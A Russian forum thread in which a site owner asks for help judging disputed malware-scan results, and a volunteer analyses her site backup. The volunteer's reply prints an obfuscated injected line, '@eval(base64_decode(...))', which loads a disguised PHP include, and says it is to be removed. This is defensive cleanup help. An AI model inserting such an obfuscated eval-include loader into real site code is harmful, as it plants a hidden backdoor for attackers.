Показано с 1 по 9 из 9.

А был ли вирус

  1. #1
    Junior Member Репутация
    Регистрация
    11.04.2020
    Сообщений
    4
    Вес репутации
    15

    Thumbs up А был ли вирус

    Здравствуйте! Очень прошу помощь

    Касперский увидел у сайта вирус, я через сайт antivirus-alarm.ru проверила, пишет тоже есть вирусы

    Обратилась на фриленс, нашла исполнителя, он сказал что все сделал.

    Касперский больше не срабатывал, Но через antivirus-alarm.ru все равно отображались вирусы

    я сказала, что хочу уточнить данный вопрос дайте на это день, он ответил

    что внешние проверки ненадежны.
    сайта в базах антивиров нет
    virustotal.com

    а то что antivirus-alarm.ru показывает все это falsepositive. Ложное срабатывание.
    внизу сайта есть приписка.

    >>Если по данным проверки один из алгоритмов обнаруживает вирус, это не всегда однозначно свидетельствует о зараженности сайта. Иногда шифрованный код рекламных блоков и другие подобные элементы сайта подпадают под определения тех или иных антивирусных баз – это НЕ вирусы.>>


    И я обратилась к другому фриленсеру и объяснила ситуацию, он попросил перекачать сайт на яндекс диск и проверил айболитом, после чего прислал отчет, вот он - http://prnt.sc/rw3ix4

    , сказал что удалили не все, вирусы остались

    Первый фриленсер с этим не согласился, сказал что Айболит как и любой сканер , в том числе и мой дает кучу ложных страбатываний, для их трактовки нужен человек и квалификация и попросил полный отчет, вот он - http://prihvatka.ru/polny-otchet-aibolit.html
    и посмотрев полный отчет написал что

    )) все как я и думал.

    итого
    Айболит показал 3 вредоносных файла.
    Читаем отчет.

    1. C:\Users\�������\Desktop\aibol it-for-windows\site/www/cheapt op_script.php
    [x] BIG FILE. SKIPPED.

    >>BIG FILE. SKIPPED означает что Айболит не смог проверить файл из за размеров. Он слишком большой.

    2. C:\Users\�������\Desktop\aibol it-for-windows\site/www/fscure /print.php
    [x] 1…······· ··············</a><br ><a href="fstrange.ru/coder/php/cur... phpshell.html">······ ············ ············,············</ a><br></div>< div

    fscure/print.php это моя утилита. Ей я проверял ваш сайт. А ругается айболит в этот раз на ссылку на мой же сайт ))
    Потому что в ссылке написано phpshell . В этой статье рассказывается про поиск шеллов.

    3.www/includes/index.php
    Это Unzipper . Вполне обычная утилита для распаковки файлов. И никак не вирус. Судя по дате ее оставил в доисторические времена кто то из разработчиков сайта.2014-10-03 00:53:05

    Второй человек вместо скрина не удаленного вируса который я просила изначально, попросил дать доступ потом написал готово, вот его отчет что вирусов нет-
    http://prihvatka.ru/polny-othet-viruson-net.html
    , сказал что работал по 3 строчке . Я спросила- так это был вирус или утилита unzipper? он говорит что в этой утилите была вредоносная приписка в полном отчете часть ее видна

    при чем я просто просила скрин хотя бы 1 вируса если есть и ничего не удалять

    Так как просто хотела убедиться, если не все удалено и сообщить об этом первому человеку чтобы не было обид и потом уже попросить удалить второго и оплатить уже его работу.

    Я же не могу оплачивать двоим за одну и ту же работу и не хотела чтобы 2 человека сделали работу и я должна одному из них не заплатить. Это не правильно.

    Так вот и вопрос в 3 строчке
    www/includes/index.php
    Это Unzipper . Вполне обычная утилита для распаковки файлов. И никак не вирус.

    или

    там вредоносная какая то приписка и это вирус?

    Очень прошу помочь

    и вопрос может ли Айболит давать ложное срабатывание как утверждал первый исполнитель?

    p.s/ после чистки вторым фриленсером на сайте antivirus-alarm.ru ничего не изменилось

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    16.06.2010
    Сообщений
    485
    Вес репутации
    443
    Извините, но я как-то сомневаюсь в том, что после прочтения описаний ваших попыток подловить двух программистов на некачественно выполненной работе вы сможете найти третьего... Вообще, я рекомендую обращаться НЕ к фрилансерам, а в крупные антивирусные компании: у них и ценник на порядок дороже, и без предоплаты они не работают.

    По вашим вопросам...
    Чем является ваш индексный файл ( index.php), вам никто не скажет без просмотра его содержимого. Он вообще может ничего не содержать, кроме тега php, если разработчик хотел запретить просмотр содержимого каталога через адресную строку браузера.

    Да, у ай-болита могут быть ложные срабатывания. Особенно, если запускать его в параноидальном режиме. Я вам больше скажу, если в корне сайта остались отчёты ай-болита (которые вам оставил первый фрилансерам, чтобы продемонстрировать результат работы), следующее сканирование объявит вредоносом этот неудаленный отчёт. Ибо в нем будут содержаться обнаруженные куски исполняемого кода.

    Относительно антивирус-аларма. Я про существование этого ресурса узнал от вас. Вам его кто-то порекомендовал? Или в гугле нашли?

  4. #3
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2856
    Здравствуйте!

    Нужна полная копия сайта (файлы + БД), причем изначальная на которую ругался Касперский. Пишите в лс.

    Помощь оказывается бесплатно, так что тут платить Вам точно не придется.
    Сердце решает кого любить... Судьба решает с кем быть...

  5. #4
    Junior Member Репутация
    Регистрация
    11.04.2020
    Сообщений
    4
    Вес репутации
    15
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Здравствуйте!

    Нужна полная копия сайта (файлы + БД), причем изначальная на которую ругался Касперский. Пишите в лс.

    Помощь оказывается бесплатно, так что тут платить Вам точно не придется.
    Спасибо большое. Скинула бэкап, написала в лс.

  6. #5
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2856
    Цитата Сообщение от magenta2009 Посмотреть сообщение
    Спасибо большое. Скинула бэкап, написала в лс.
    Забрала бэкап, ждите ответа. Если что-то понадобится будьте на связи, напишу в личку.
    Сердце решает кого любить... Судьба решает с кем быть...

  7. #6
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2856
    Добрый день!

    По результатам анализа Вашего сайта могу сказать, что вирусы там были и первый фрилансер почти все удалил. Единственное:

    1. Файлик cheapt op_script.php нужно удалить из корня сайта.
    2. В файле /www/published/SC/html/scripts/includes/category.php удалить кусок
    Код:
    @eval(base64_decode('QGluY2x1ZGUoIm1vZHVsZXMvc2hpcHBpbmcvbGFuZ3VhZ2VzL3J1LmludGVyc3NoaXBwZXJtb2R1bGUucGhwIik7'));
    В остальном все чисто.
    Сердце решает кого любить... Судьба решает с кем быть...

  8. #7
    Junior Member Репутация
    Регистрация
    11.04.2020
    Сообщений
    4
    Вес репутации
    15
    Спасибо вам огромное!!! То есть второй фрилансер удалял уже не вирусы а просто куски кодов?

  9. #8
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Aleksandra
    Регистрация
    13.01.2007
    Сообщений
    7,761
    Вес репутации
    2856
    Цитата Сообщение от magenta2009 Посмотреть сообщение
    То есть второй фрилансер удалял уже не вирусы а просто куски кодов?
    Второй вообще дилетант в этом деле.

    p.s. Пароли смените.
    Сердце решает кого любить... Судьба решает с кем быть...

  10. #9
    Junior Member Репутация
    Регистрация
    11.04.2020
    Сообщений
    4
    Вес репутации
    15
    Цитата Сообщение от Aleksandra Посмотреть сообщение
    Второй вообще дилетант в этом деле.

    p.s. Пароли смените.

    Спасибо!!!

Похожие темы

  1. Ответов: 13
    Последнее сообщение: 22.02.2009, 03:31
  2. а был ли вирус?
    От intrepid в разделе Помогите!
    Ответов: 17
    Последнее сообщение: 22.02.2009, 02:36
  3. был вирус
    От Artur Z. в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 18.08.2008, 20:25
  4. Ответов: 6
    Последнее сообщение: 23.04.2008, 14:35
  5. а был ли вирус?-2
    От intrepid в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 18.10.2007, 13:48

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00682 seconds with 17 queries